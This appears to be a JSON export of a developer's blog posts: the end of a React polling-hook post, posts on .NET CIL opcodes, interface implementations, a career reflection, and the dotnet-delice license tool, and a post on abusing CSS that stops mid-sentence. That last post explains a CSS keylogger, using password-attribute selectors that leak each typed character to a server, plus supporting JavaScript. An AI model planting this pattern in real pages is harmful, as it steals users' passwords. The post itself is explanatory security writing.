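  const [status, setStatus] = useState("unknown");

  // Poll roughly every 5 seconds, but never overlap requests: the next
  // timeout is only scheduled once the Promise from this callback resolves.
  useRecursiveTimeout(async () => {
    const res = await fetch("/api/status");
    const json = await res.json();
    setStatus(json.status);
  }, 5000);

  return <p>Current status: {status}</p>;
};

export default StatusPoller;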
Hopefully this example with setTimeout is useful for you, feel free to copy the code or put it on npm yourself.\n", "id": "2019-09-23-recursive-settimeout-with-react-hooks" }, { "title": "What is an OpCode?", "url": "https://www.aaron-powell.com/posts/2019-09-17-what-is-an-opcode/", "date": "Tue, 17 Sep 2019 09:17:10 +1000", "tags": [ "dotnet" ], "description": "IL is full of these things call OpCodes, but what are they?", "content": "In my last post we say the differences between interface implementations in the IL that is generated, but as a refresher, it looks like this:\n.method private final hidebysig newslot virtual instance void UserQuery.ICounter.Add ( int32 count ) cil managed { .override method instance void UserQuery/ICounter::Add(int32) .maxstack 8 IL_0000: ldarg.0 IL_0001: ldarg.0 IL_0002: call instance int32 UserQuery/Counter::get_Count() IL_0007: ldarg.1 IL_0008: add IL_0009: call instance void UserQuery/Counter::set_Count(int32) IL_000e: nop IL_000f: ret And the code that created it looked like this:\n1 2 3 4 5 6 7 8 9 interface ICounter { void Add(int count); } class Counter : ICounter { public int Count { get; set } public void Add(int count) => Count += count; } Today, I want to talk about what the heck that all means, specifically, what makes up the method body, and to do that I want to introduce you to the System.Reflection.Emit namespace and specifically the OpCodes class.\nBefore We Dive In There’s a bit of important background information to understand before we dive too deep into what we’re going to look at today, and that’s how .NET works. .NET languages like C#, F# and VB.NET (as well as others) all output the Common Intermediate Language (CIL) (sometimes referred to as Microsoft Intermediate Language/MSIL) that is then executed by a runtime such as the Common Language Runtime (CLR) using a Just-In-Time (JIT) compiler to create the native code that is executed.\nSo, regardless of whether you’re writing C# or F# it’s all the same at the end of the day and you can convert F# code to C# by reversing the CIL, but it’s probably going to be rather funky. This is how tools like ilspy work.\nThe CIL is defined as part of the Common Language Infrastructure (CLI) which is standardised as ECMA-335 with the primary implementation being the one Microsoft has done for .NET, but there’s nothing stopping someone else making their own implementation (except time…). Before anyone asks, no, I haven’t read ECMA-335. I did use to have it on my kindle but I never did read it. ECMA-262 on the other hand… 😉\nCIL is a stack-based bytecode, making it quite low-level and reminds me a lot of the x86 assembly programming I did at university, so if that’s your jam, then we’re in for some fun! If you’ve never had the, err, pleasure of working with assembly, or stack-based machines, the most important thing to know is that you push things onto a stack so that you can read them off again, and you have to read things off in the reverse order that you pushed them on, last-on-last-off style.\nNow, onto the fun part!\nOpCodes An OpCode represents an operation in CIL that can be executed by the CLR. 
These are mostly about working with the stack, but thankfully it’s not all PUSH and POP, we get some higher-level operations to work with, and even basic indexers that we can leverage too (so it’s not quite as sequential as 8086 that I learnt).\nOur First OpCode Let’s start with this line:\nIL_0000: ldarg.0 First things first, we can remove the stuff before the :, as that is representing the label of the line, which we could use as a jump point, but we don’t need the labels at the moment so we’ll focus on the instruction:\nldarg.0 In .NET this is represented as OpCodes.Ldarg_0 and its role is to push the first argument (of the current method) onto the stack. There’s also ldarg.1, ldarg.2 and ldarg.3 to access the first 4 arguments to a method, with ldarg.s <int> being used to access all the rest. In the future, we’ll see how to use ldarg.s, it’s not for today.\nSo if we’re calling our code like this:\n1 counter.Add(1); Inside the Add CIL we’re pushing 1 into the first position on the stack.\nCalling Functions in CIL The next important piece of CIL to look at is this:\ncall instance int32 UserQuery/Counter::get_Count() This is a method call using the Call OpCode. To use this OpCode we need to provide some more information, the location of the method we’re calling, the return type and finally the method reference.\nBut wait, what method are we calling? We’re calling Counter.get_Count(), but we never wrote that in our C# code, it was generated for us as the property accessor. This method just wraps the backing field (which was also generated for us as we used an auto-property).\nSince the method is part of the type we’re also part of we use the instance location and it’ll return an int32. And since this is a non-void method call we need to push the return value onto the stack, which is done using ldarg.1, or in .NET Ldarg_1.\nAdding Numbers With ldarg.1 done we now have two values on the stack, the argument to Add is at index 0 and the current value of Count is at index 1. This means we can add those numbers together, which is what the + operator does, resulting in the following IL:\nadd Bet you didn’t pick that’s what the Add OpCode did!\nThis CIL instruction will also put the resulting value onto the stack, so there’s no need to use an ldarg OpCode after it.\nUpdating Our Property It’s time to update the Count property of our object and again we’ll use the Call OpCode to do it:\ncall instance void UserQuery/Counter::set_Count(int32) As we need to pass an argument to set_Count (the auto-generated assignment function) you might wonder how it gets that, well it gets it off the stack. When a function takes arguments it’ll pop off as many as it requires from the stack to execute, so you need to make sure that when you’re pushing data onto the stack it’s pushed on in the right order, otherwise you can end up with type mismatch, or the wrong value being in the wrong argument.\nFinally, Add will exit using the Ret OpCode:\nnop ret I’m not sure why the nop OpCode is included by the compiler, it doesn’t do anything and thus can be omitted.\nConclusion Hopefully you’re still with me and have enjoyed dipping your toe into understanding what an OpCode is in CIL. 
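If you want to take it one step further, the System.Reflection.Emit namespace from the start of the post lets you emit that same sequence of opcodes by hand. Here's a minimal sketch of my own (using a plain stand-in Counter class, not the Durable Entities one from the earlier post) that builds an equivalent Add method at runtime:

using System;
using System.Reflection;
using System.Reflection.Emit;

class Counter
{
    public int Count { get; set; }
}

class EmitDemo
{
    static void Main()
    {
        // builds: void Add(Counter counter, int count) => counter.Count += count;
        var add = new DynamicMethod("Add", typeof(void), new[] { typeof(Counter), typeof(int) });
        var getCount = typeof(Counter).GetProperty("Count").GetGetMethod();
        var setCount = typeof(Counter).GetProperty("Count").GetSetMethod();

        var il = add.GetILGenerator();
        il.Emit(OpCodes.Ldarg_0);        // push the Counter (receiver for the set_Count call later)
        il.Emit(OpCodes.Ldarg_0);        // push it again (receiver for get_Count)
        il.Emit(OpCodes.Call, getCount); // pops the Counter, pushes Count
        il.Emit(OpCodes.Ldarg_1);        // push the count argument
        il.Emit(OpCodes.Add);            // pops both numbers, pushes the sum
        il.Emit(OpCodes.Call, setCount); // pops the sum and the Counter, sets the property
        il.Emit(OpCodes.Ret);

        var addDelegate = (Action<Counter, int>)add.CreateDelegate(typeof(Action<Counter, int>));

        var counter = new Counter();
        addDelegate(counter, 1);
        Console.WriteLine(counter.Count); // 1
    }
}

It's the same ldarg.0, ldarg.0, call, ldarg.1, add, call, ret dance we just walked through, minus the compiler's trailing nop.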
We’ve broken down the 8 lines of CIL that were generated for this one line of C#:\n1 Count += count; With our method implementation we used the expression body syntax rather than a traditional method signature.\nWhat you may be interested to know is that there is no difference in the IL generated for these two method types, since they are functionally equivalent.\nThe same goes for the use of Count += count vs Count = Count + count, both generate the same CIL as there’s no difference with the addition assignment operator (in our example, there are scenarios when that doesn’t always hold true).\nIt’s important to be able to understand these differences or lack-there-of, so we don’t make arbitrary code style decisions based on preconceived beliefs about how the code is executed.\nWe’ll keep exploring CIL as we go on, so if there’s anything specific you’d like to look into, let me know and we can do some digging!\n", "id": "2019-09-17-what-is-an-opcode" }, { "title": "A Quirk With Implicit vs Explicit Interfaces", "url": "https://www.aaron-powell.com/posts/2019-09-11-a-quirk-with-implicit-vs-explicit-interfaces/", "date": "Wed, 11 Sep 2019 13:08:28 +1000", "tags": [ "dotnet", "csharp", "fsharp", "serverless" ], "description": "Here's something I learnt about interfaces in .NET while exploring IL", "content": "The other day I got to work and the first thing I did was open an IL disassembler and got to town reading the IL of some code I was having a problem with.\nThat’s a pretty normal start to most .NET developers day right? Right…?\nIt all came about as I’m doing some exploration of Durable Entities which is part of the Durable Functions v2 preview that was announced at Build. I was using the new strongly-typed support that appeared in the beta-2 release, and allows you to write entities like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 public interface ICounter { void Add(int count); void Clear(); } [JsonObject(MemberSerialization = MemberSerialization.OptIn)] public class Counter : ICounter { [JsonProperty] public int Count { get; set; } public void Add(int count) => Count += count; public void Clear() => Entity.Current.DestructOnExit(); [FunctionName(nameof(Counter))] public Task Run([EntityTrigger] IDurableEntityContext ctx) => ctx.DispatchAsync<Counter>(); } And then we can invoke it in a strongly-typed manner, rather than using magic strings:\n1 2 // ctx is IDurableEntityContext await ctx.SignalEntityAsync<ICounter>(id, proxy => proxy.Add(1)); This gives some nice type-safety to the way that you work with your entities.\nNaturally though, I wasn’t writing this in C#, I was using F#, which means the code looks more like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 type ICounter = abstract member Add: int -> unit abstract member Clear: unit -> unit [<JsonObject(MemberSerialization = MemberSerialization.OptIn)>] type Counter() = [<JsonProperty>] member val Count = 0 with get, set interface ICounter with member this.Add count = this.Count <- this.Count + count member this.Clear() = this.Count <- 0 [<FunctionName("Counter")>] member __.Run([<EntityTrigger>] ctx : IDurableEntityContext) = ctx.DispatchAsync<Counter>() And the invocation is:\n1 do! ctx.SignalEntityAsync<ICounter>(id, (proxy : ICounter) => proxy.Add(1)) |> Async.AwaitTask But it kept throwing a highly cryptic error within the Durable Functions framework that the call to the method Add failed, but it wouldn’t tell me why. 
After a bunch of debugging into the source of Durable Functions I found the cause of the failure, the Add method wasn’t being found on the Counter instance. But the C# code worked just fine, so what gives?\nWell it turns out that in F# when you implement an interface it’s implemented explicitly, whereas in C# you can implement an interface implicitly or explicitly.\nInterface Implementations, Implicit vs Explicit Before really understanding the problem we need to understand a bit about how interface implementations work. Let’s do it in C# since it supports both types and we’ll start with an implicit implementation. This is what you’re most likely using when you’re working with interfaces, and it looks like this:\n1 2 3 4 5 6 7 interface IFoo { void Bar(); } class Foo : IFoo { public void Bar() { } } When you do an implicit interface implementation you are adding public non-static methods to the class, and they have to be public non-static (see here). What this means is that the class can be thought of as itself (Foo) or its interface(s) (IFoo) and the members provided by that interface are part of the class, they are implicitly there.\nOk, so what’s an explicit interface implementation look like?\n1 2 3 4 5 6 7 interface IFoo { void Bar(); } class Foo : IFoo { void IFoo.Bar() { } } The difference this time is that in our class we have a non-public Bar function that is prefixed with the interface name (IFoo). Since the member is non-public we have to be explicit that the type is the interface if we want to access the members that are provided by the interface. In the docs there are a few scenarios of why you’d want to use explicit interface implementations over implicit, and it mainly comes down to how to handle multiple interfaces on a single type.\nSince F# only supports explicit interface implementations you only think of types as their interface, which is how I tend to think of types-implementing-interfaces in C# anyway, so what’s the big deal?\nNot All IL is Generated the Same Back to the problem that I’d discovered, it was telling me that the type I was providing, Counter, didn’t have a member Add that could be accessed, and now that we understand how the members of an explicit interface are defined, that actually makes sense, there is no member Add on Counter, its name is actually ICounter.Add, because it’s only part of the interface implementation.\nHere’s the IL generated:\n.method private final hidebysig newslot virtual instance void UserQuery.ICounter.Add ( int32 count ) cil managed { .override method instance void UserQuery/ICounter::Add(int32) .maxstack 8 IL_0000: ldarg.0 IL_0001: ldarg.0 IL_0002: call instance int32 UserQuery/Counter::get_Count() IL_0007: ldarg.1 IL_0008: add IL_0009: call instance void UserQuery/Counter::set_Count(int32) IL_000e: nop IL_000f: ret } Compare that to the implicit interface implementation:\n.method public final hidebysig newslot virtual instance void Add ( int32 count ) cil managed { .maxstack 8 IL_0000: ldarg.0 IL_0001: ldarg.0 IL_0002: call instance int32 UserQuery/Counter2::get_Count() IL_0007: ldarg.1 IL_0008: add IL_0009: call instance void UserQuery/Counter2::set_Count(int32) IL_000e: nop IL_000f: ret } Notice the difference between .method definitions, our explicit is private while implicit is public and the name of the explicit is UserQuery.ICounter.Add (Namespace.InterfaceName.MemberName) compared to Add for implicit.\nWhy Does It Matter? 
Ok, it’s all very interesting learning about the differences in the IL generated by the compiler, but why is this important to know?\nWell, it turns out that you need to understand this difference if you’re doing Reflection. Let’s say you have a type and you want to get a method of that type by its name. To do that you’d write code like this:\n1 2 3 4 5 6 7 var method = typeof(T).GetMethod( methodName, BindingFlags.IgnoreCase | BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance ); But this will fail if the method name you’re looking for is provided by an explicitly implemented interface!\nTry out this code on try.dot.net:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 using System; using System.Linq; using System.Reflection; public class Program { public static void Main() { Console.WriteLine(string.Join(", ", typeof(FooE).GetMethods(BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance).Select(m => m.Name))); Console.WriteLine(string.Join(", ", typeof(FooI).GetMethods(BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance).Select(m => m.Name))); } } interface IFoo { void Bar(); } class FooE : IFoo { void IFoo.Bar() => Console.WriteLine("Explicit Bar"); } class FooI : IFoo { public void Bar() => Console.WriteLine("Implicit Bar"); } The output will be:\n1 2 IFoo.Bar, Equals, Finalize, GetHashCode, GetType, MemberwiseClone, ToString Bar, Equals, Finalize, GetHashCode, GetType, MemberwiseClone, ToString Meaning that our call to GetMethod and just providing Bar will return null since this is no method on that type with that name!\nConclusion This was a really fun problem to try and solve, it’s been a long time since I dived deep into .NET internals and it’s quite interesting to learn the difference in the way interface implementations are handled.\nThere’s an open bug on Durable Functions to work out a way to resolve this and it turned out that I caught a few people with this one!\n", "id": "2019-09-11-a-quirk-with-implicit-vs-explicit-interfaces" }, { "title": "A Career in 10 Years", "url": "https://www.aaron-powell.com/posts/2019-09-02-a-career-in-10-years/", "date": "Mon, 02 Sep 2019 09:13:03 +1000", "tags": [ "career" ], "description": "A reflection on my journey over the last 10 years", "content": "Where are you from?\nThis is a pretty common question we ask each other in Australia as most people I know aren’t living in the city they were born in, and it’s a question that I’ve been asked from time to time.\nWhile I live in Sydney most people are surprised to find out that I didn’t grow up in Sydney, but I’m from Melbourne originally. A few days ago I had a memory pop up on Facebook that told me that it was 10 years ago that I left my job in Melbourne and started the journey that would see me where I am today.\nFeeling nostalgic I decided I wanted to share that journey here.\nStarting My Career (aka, Background to the Story) I grew up in Melbourne’s eastern suburbs, went to school and uni out that way and in 2004 graduated with an IT degree from Deakin University. I was a solid-B student, I did well, but never great, and honestly, I was glad when it was done. Being a student isn’t my jam.\nIn 2005 it was time to enter the workforce as an IT professional (I didn’t work IT in uni, I worked fast food!) and my first job was mobile tech support, I’d go out to people’s houses and plug their modems in. Glamorous stuff.\nIn mid-2005 I started interviewing for some software jobs. 
My first interview I was really excited for, it was as a software tester in gaming! Awesome, who doesn’t want to software test games?! This is where I first learnt what gaming meant as it was a role as a software tester for slot machines. I declined the 2nd interview.\nShortly after I was offered a role at a web development company, it was a graduate role but I didn’t care, I was being paid to write software! This is where I learnt about Content Management Systems (in hindsight I’m surprised I’d never stopped to think about how content on websites was managed…), I got to experience the browser wars, was introduced to Umbraco and learnt all sorts of other technology.\n2009 I had a pretty shitty start to 2009. I’d only just started living out of home for the first time (I was living on my own too) and I separated from my long-term girlfriend so a combination of loneliness and pining saw me pretty down.\nBut the upside to this was that it was the catalyst I needed to start properly getting into Open Source. To fill me, ever-expanding free time, I started contributing to Umbraco and as a result of this, I was invited to Umbraco’s yearly conference, Codegarden. This was the first time I’d ever attended a conference (and I think I’d only once been to a User Group) so the fact that I was invited to travel to Copenhagen was kind of a big deal!\nAs I was preparing to head to Codegarden I made a decision, I would be looking for work. I was pretty unhappy with my life, there was no reconciling the relationship I’d lost (and the friends I’d lost as a result) so I needed a change, and my rationale was that I was starting to get a bit of notice in the Umbraco community and there’d have to be someone looking to hire while I was at the event so why not take an opportunity, even if it meant moving to Europe.\nIt turned out that there was at least 1 person who was hiring there, but the move would be a lot less dramatic. I met Shannon at the retreat prior to Codegarden itself (the retreat is a pre-event where contributors and community influencers join the HQ team to discuss strategy, roadmaps and other stuff) and he was the head of technology at an Umbraco-centric agency based in Sydney and they just so happened to be looking for a Senior Developer. Well, when we got back from Denmark I chatted with them a bit more, I put forth what I was looking for, they agreed and at the start of August, I told my parents I was going to move to Sydney and I resigned from my job.\nStarting a New Life in Sydney To a certain degree, the move to Sydney was not being done for the right reasons, I was ultimately trying to escape my past by running away. Totally healthy! But at the time I thought it was the right thing to do.\nWhen I moved to Sydney I didn’t know anyone. I didn’t attend User Groups or conference then so I just went to work and then went home and coded (or watched TV). Not an overly glamorous life and what’s more was it started feeding into the self-doubt that I had about moving to begin with.\nBy the end of 2009, I was pretty miserable, I hadn’t met any new people (other than those I worked with) which was probably not helped by the fact that I wasn’t really trying to meet people.\nI was left with two options, pack it in and move back to Melbourne or make an effort to actually try and meet some people. Given I’d tried nothing and was reaping the benefits of that it was time to try something.\nIn 2009 Twitter was starting to take off in the tech community and this was where I started. 
While I might not have “got” it (and maybe still don’t) it was a useful tool to start finding out about people in tech that were in Sydney without actually going out!\nThe next step was starting to attend User Groups and I started attending ones that the people I was “meeting” on Twitter were also attending. This helped make it feel a whole lot less daunting; I was no longer going somewhere where I didn’t know anyone, I was going somewhere that I hadn’t met anyone, which was an important difference. Since I “knew” some people in attendance from Twitter it was a lot easier to strike up a conversation, we’d just carry on from something we were chatting about online.\n2019 10 years and 3 employers later and I’m still in Sydney.\nWhen I look back at where I was in 2019 it does feel surreal. I very nearly called off the experiment of moving interstate but now when I look at it I can’t imagine what my life would’ve been like if I had.\nIt took me a while to get over the self-doubt that I had but something that I think everyone can relate to, everyone’s had points in their life where they wonder if they’ve made the right call.\nI might not have moved to Sydney for the right reasons but there are plenty more wrong reasons that I could’ve stayed in Melbourne.\nAnd if it’d not been for that I wouldn’t have had the opportunities to grow into a leadership role, try my hand at sales or join Microsoft.\nIn the end, you’ll never know what you’re capable of if you never give it a try. So what are you waiting for?\n", "id": "2019-09-02-a-career-in-10-years" }, { "title": "More License Discovery With dotnet-delice", "url": "https://www.aaron-powell.com/posts/2019-08-30-more-license-discovery-with-dotnet-delice/", "date": "Fri, 30 Aug 2019 10:16:20 +1000", "tags": [ "dotnet", "fsharp" ], "description": "A new release of dotnet-delice with even more license discovery support", "content": "In my last post I introduced you to a tool for looking up licenses of .NET projects called delice.\nThis week I released the first update, version 1.1.0, that brings a big improvement to the license detection for the legacy licensing format of many NuGet packages.\nDetermine Licenses via the GitHub API By-and-large the dependencies we rely on are the output of an OSS project and that project is more often than not hosted on GitHub. Because of this we can use the GitHub License API to try and get the license information of a project, which delice now supports:\n$> dotnet delice --check-github ~/my-project The way this works is that when delice finds a project using the legacy licenseUrl nuspec property and that license isn’t a hard-coded one in the cache, it’ll look at the URL and determine if it’s a URL to a license on GitHub.\nTake the license for the package Microsoft.AspNetCore, which gives a url of https://raw.githubusercontent.com/aspnet/AspNetCore/2.0.0/LICENSE.txt. From here, delice will get the repository owner (aspnet) and the repository name (AspNetCore) to then call the GitHub API and get back the license information, which will tell me that the license is Apache-2.0. delice will then cache that internally for the run so if the URL is used across a number of packages, or that package is referenced in a number of projects in the solution, it’ll only hit the API once.\nThe code to do this can be found here.\nIt’s worth noting that there is a known limitation of the API check, it’ll always check the license against master, not any other branch or tag. 
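To make the owner/name extraction a bit more concrete, here's a rough sketch of that lookup in C# (delice itself is written in F#, so this is my illustration of the idea rather than its actual code):

using System;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Text.Json;
using System.Threading.Tasks;

static class GitHubLicenseLookup
{
    static readonly HttpClient Client = new HttpClient();

    // Given a legacy licenseUrl like
    // https://raw.githubusercontent.com/aspnet/AspNetCore/2.0.0/LICENSE.txt
    // pull out the owner and repository name, then ask the GitHub License API what the license is.
    public static async Task<string> GetSpdxIdAsync(Uri licenseUrl)
    {
        // raw.githubusercontent.com paths are /{owner}/{repo}/{ref}/{file}
        var owner = licenseUrl.Segments[1].TrimEnd('/');
        var repo = licenseUrl.Segments[2].TrimEnd('/');

        var request = new HttpRequestMessage(HttpMethod.Get, $"https://api.github.com/repos/{owner}/{repo}/license");
        // the GitHub API rejects requests that don't send a User-Agent
        request.Headers.UserAgent.Add(new ProductInfoHeaderValue("license-lookup-sketch", "1.0"));

        var response = await Client.SendAsync(request);
        response.EnsureSuccessStatusCode();

        using var doc = JsonDocument.Parse(await response.Content.ReadAsStringAsync());
        return doc.RootElement.GetProperty("license").GetProperty("spdx_id").GetString();
    }
}

// e.g. await GitHubLicenseLookup.GetSpdxIdAsync(new Uri("https://raw.githubusercontent.com/aspnet/AspNetCore/2.0.0/LICENSE.txt"))
// comes back as "Apache-2.0"

Like delice, the sketch ignores the version segment baked into the URL entirely and just asks about the repository as it stands today.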
This is a design choice, so while it does mean you may get a different license if a project was re-licensed across versions, I expect the likelihood of that to be low, relative to the effort required to support it. After all, this is meant to be a workaround for packages that haven’t been updated to use the new nuspec format, not a proper solution.\nAvoiding Rate Limiting By default the API call is done anonymously and that means you have a limit of 50 calls per hour to the GitHub API, something that could be blown out in a single run if you have a lot of legacy-style NuGet packages. It’s better to provide a GitHub Personal Access Token to the call like so:\n$> token=abc123... $> dotnet delice --check-github --github-token $token ~/my-project When you provide a token the rate limit is increased to 5000 calls per hour, which should work for most scenarios. If you are hitting rate-limit issues I’d like to know so we can work out even smarter solutions (I have ideas but I only want to invest in the effort if it’s actually needed!).\nComparing with Common Templates Relying on the GitHub API isn’t foolproof, not all licenses are detected by GitHub and not all projects are hosted on GitHub. Also, if you embed the license file in the NuGet package, rather than just provide an SPDX identifier, it’s still not possible to know what the license is.\nTo address this I’ve borrowed from the approach that GitHub uses for license detection and implemented some complex maths in the form of Sørensen–Dice coefficient to compare a license against a known template:\n$> dotnet delice --check-license-content ~/my-project When you provide this flag delice will download the file contents from the URL and compare it to some templates stored within itself. If any are a close enough match (the threshold is 90%) delice will assume that that is the license of the project.\nThe code to do this can be found here, including the implementation of the Dice coefficient (which I found online 😝).\nPresently I only have MIT and Apache-2.0 as templates to compare as they seemed to be the most common ones I’ve come across when doing my research, but if there are others let me know or send me a PR.\nShowing License Conformance When trying to be aligned with Tiereny’s delice I needed to add one missing piece, showing the license conformance to the SPDX list. I’ve added this to the 1.1.0 release of delice and now you can see which of your projects are licensed using OSI or FSF approved licenses, and whether any licenses are using a deprecated license format:\nProject dotnet-delice License Expression: MIT ├── There are 10 occurances of MIT ├─┬ Conformance: │ ├── Is OSI Approved: true │ ├── Is FSF Free/Libre: true │ └── Included deprecated IDs: false └─┬ Packages: ├── FSharp.Core ├── Microsoft.NETCore.App ├── Microsoft.NETCore.DotNetAppHost ├── Microsoft.NETCore.DotNetHostPolicy ├── Microsoft.NETCore.DotNetHostResolver ├── Microsoft.NETCore.Platforms ├── Microsoft.NETCore.Targets ├── NETStandard.Library ├── Newtonsoft.Json └── System.ComponentModel.Annotations This will help you ensure that you understand more about the licenses in use with a quick scan, without having to know the details of each license type.\nExtracting Out the Core Another change I introduced in the 1.1.0 release was to extract the core of delice out into a separate NuGet package, DotNetDelice.Licensing. 
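Before moving on to that package, here's a back-of-the-napkin sketch of how a bigram-based Sørensen–Dice comparison works; it's my own illustration of the idea, not the implementation delice ships:

using System;
using System.Collections.Generic;
using System.Linq;

static class LicenseSimilarity
{
    // break the text into overlapping two-character chunks (bigrams)
    static HashSet<string> Bigrams(string text)
    {
        var cleaned = new string(text.Where(c => !char.IsWhiteSpace(c)).ToArray()).ToLowerInvariant();
        var bigrams = new HashSet<string>();
        for (var i = 0; i < cleaned.Length - 1; i++)
            bigrams.Add(cleaned.Substring(i, 2));
        return bigrams;
    }

    // Sørensen–Dice coefficient: 2 × |A ∩ B| ÷ (|A| + |B|), giving a score between 0 and 1
    public static double Compare(string candidate, string template)
    {
        var a = Bigrams(candidate);
        var b = Bigrams(template);
        if (a.Count == 0 && b.Count == 0)
            return 1.0;
        var overlap = a.Intersect(b).Count();
        return 2.0 * overlap / (a.Count + b.Count);
    }
}

// anything scoring 0.9 or above against, say, the MIT template gets treated as MIT:
// var looksLikeMit = LicenseSimilarity.Compare(downloadedLicenseText, mitTemplateText) >= 0.9;

Anyway, back to the new DotNetDelice.Licensing package.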
While you don’t need this package when you install the CLI tool (tools are self-contained) it’s available if you want to integrate it into any other tool or system you’re building.\nBe aware though that I’ve written this in F# and it’s using F# styling and types, so expect to deal with them.\nConclusion That’s a lap around what’s new in release 1.1.0 so be sure to check it out as it’ll, hopefully, give you more coverage of what licenses you have in your projects.\nIf you’re using it I’d love to know what you think of these updates and what other features you’d like to see from delice going forward.\n", "id": "2019-08-30-more-license-discovery-with-dotnet-delice" }, { "title": "What Licenses Are in Use?", "url": "https://www.aaron-powell.com/posts/2019-08-20-what-licenses-are-in-use/", "date": "Tue, 20 Aug 2019 08:57:59 +1000", "tags": [ "dotnet", "fsharp" ], "description": "Ever wondered what licenses are in use of your project? Here's a tool to help you out", "content": "Have you ever wondered what licenses the dependencies of your .NET project are? In the ever-expanding world of open source software usage ensuring that your being compliant with the licenses of your dependencies is becoming harder. Do you have copyleft dependencies? Are you abiding by their licensing terms? Maybe there’s some legally grey licenses like WTFPL that you need to watch out for.\nThis can become even trickier when you look into transient dependencies. You know what dependencies you directly consume, but what about the ones that you indirectly consume as they are a dependency of a dependency?\nEnter dotnet-delice TL;DR: I created a dotnet global tool called dotnet-delice to help you with this.\ndotnet-delice, or delice for short, is a tool that will look at the dependencies you have in your project and attempt to determine what license they use and display the results for you. This is a port of the Node.js utility delice, created by Tierney Cyren.\nYou can install it from NuGet:\n1 > dotnet tool install --global dotnet-delice --version 1.0.0 And then run it by pointing to a folder, a solution file or a csproj/fsproj file:\n1 > dotnet delice ~/github/DotNetDelice/DotNetDelice.sln Here’s a snapshot of the output it will generate:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 Project dotnet-delice License Expression: MIT ├── There are 10 occurances of MIT └─┬ Packages: ├── FSharp.Core ├── Microsoft.NETCore.App ├── Microsoft.NETCore.DotNetAppHost ├── Microsoft.NETCore.DotNetHostPolicy ├── Microsoft.NETCore.DotNetHostResolver ├── Microsoft.NETCore.Platforms ├── Microsoft.NETCore.Targets ├── NETStandard.Library ├── Newtonsoft.Json └── System.ComponentModel.Annotations delice will scan the dependency graph of the project and output the license information in a human-readable format (above) or generate JSON (to stdout or a file). The JSON could be used in a build pipeline to fail a build if there are unexpected licenses detected.\nYou’ll find the source code on GitHub if you want to have a dig around in it yourself.\nA Note on Package Licenses While I was doing my research into how this works I came across this NuGet issue. This issue raised a concern about the license information in the nuspec file being just the licenseUrl. Since the license is external to the package the URL could conceivably change without changing the package, thus changing the license you agreed to originally without your knowledge.\nThis resulted in the deprecation of licenseUrl in favour of a license property. 
Now the solution is to store the license expression (ideally in spdx format) or embed the license file within the package. Here is how it’s set in my project.\nBy taking this approach the license is now tied to the release of the package and thus you’re unlikely to have it changed without you knowing, since a change requires an updated package.\nAs this is quite a large change to the NuGet ecosystem many packages are still using the legacy licensing format. This makes it a little more challenging for delice to work out what license a package uses. Currently, the tool has a “cache” of known license URLs and which license it maps to (and the packages that use it), but when a license is found that isn’t known it’ll be marked as “Unable to determine” and show the URL in the output. Feel free to submit a PR to add the URL to the cache!\nHopefully, the increased visibility will help encourage package authors to update their license information or encourage people to submit PR’s to update.\nConclusion delice aims to empower you with information so that you understand what’s in use by your projects and make the appropriate decisions about the dependencies you use.\nThere’s a bit of a roadmap on the projects GitHub repo but I’d like to hear what you would want from this tool.\n", "id": "2019-08-20-what-licenses-are-in-use" }, { "title": "CSS Can Do This... And It's Terrifying!", "url": "https://www.aaron-powell.com/posts/2019-08-14-css-can-do-this-and-its-terrifying/", "date": "Wed, 14 Aug 2019 11:33:46 +1000", "tags": [ "css" ], "description": "A look at how you can abuse CSS for evil(?)", "content": "Time for #DevDiscuss!\nTonight's topic: CSS can do that?\nLet's start with some questions:\n- What is a CSS feature not everybody knows about?\n- What has changed about CSS capabilities in the past few years?\n- How do you approach browser support issues and fallbacks? pic.twitter.com/eg9THMsVnT\n— DEV Community (@ThePracticalDev) August 14, 2019 Inspired by today’s #DevDiscuss I commented with my favourite misdeeds in CSS.\nDid you know you can do user tracking of clicks/mouse movements/etc. only with CSS?\nHow about creating a keylogger?\nYep, all that's possible with CSS #DevDiscuss https://t.co/vIzJdSHNp7\n— Aaron Powell (@slace) August 14, 2019 So let’s have a look at how they work.\nCSS Keylogger This has been around for a while now that you can use CSS to create a keylogger, but as is rightly pointed out in this post it’s not “really” just CSS, it does rely on some JavaScript. So let’s dissect how it works.\nWe have our selector like so:\n1 2 3 input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } Assume it’s repeated for every character you want to log.\nThe important part of the selector is the substring match on value, this part: [value$="a"]. This is an attribute selector, specifically a substring selector that was added as part of CSS 3 and what it’s doing is saying is that it’ll match when the value attribute of the DOM element ends with a (you can use ^ for begins with if you wanted).\nSo we’re matching when the value attribute contains that but if you were to look into the DOM of a form on a page you’ll notice something, the value attribute isn’t set. Here, take a look at this:\nIf you open up the dev tools in your browser you’ll notice that when you type in the input the attribute doesn’t change, it’s always set to Test here. But if you were to use JavaScript to inspect the value, document.getElementById('demo-01').value it’ll have what you entered. 
This is because the attribute represents the default value of the <input>, not the current value, that’s something that might get computed, depending on the type of input you have.\nWhat does it mean for us creating a keylogger in CSS? Well, the simple fact is that you can’t create one purely with CSS but you can create one with CSS and a bit of JavaScript because we’re going to need to update the value attribute along the way.\nThis is quite easy to do, you just need some JavaScript like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 let inputs = document.getElementsByTagName("input"); for (let i = 0; i < inputs.length; i++) { let input = inputs[i]; input.addEventListener("keypress", e => { e.preventDefault(); let char = String.fromCharCode(e.keyCode); let newValue = input.value + char; input.setAttribute("value", newValue); input.setSelectionRange(newValue.length, newValue.length); }); } What this does is it “pretends” that you’re doing your keypress appropriately by catching it early and then pushing the character you intended to enter onto the value attribute, making it look like you were typing normally. We then use the setSelectionRange method on the input to position the caret to the end of the input so you are none the wiser. A demo can be found here of this in action.\nBut if you’re able to run JavaScript to bypass how the DOM works, why bother with CSS anyway? The problem isn’t so much the code you write but more the code you might leverage, in particular, UI frameworks.\nFor example, React synchronises the value attribute with state if you’re using a controlled form, which is something that this issue tracks. So if you’re on a website that is using React then that website is vulnerable to this kind of an attack, whether it’s through an extension in your browser or some dodgy ad running on the site.\nYes, you require 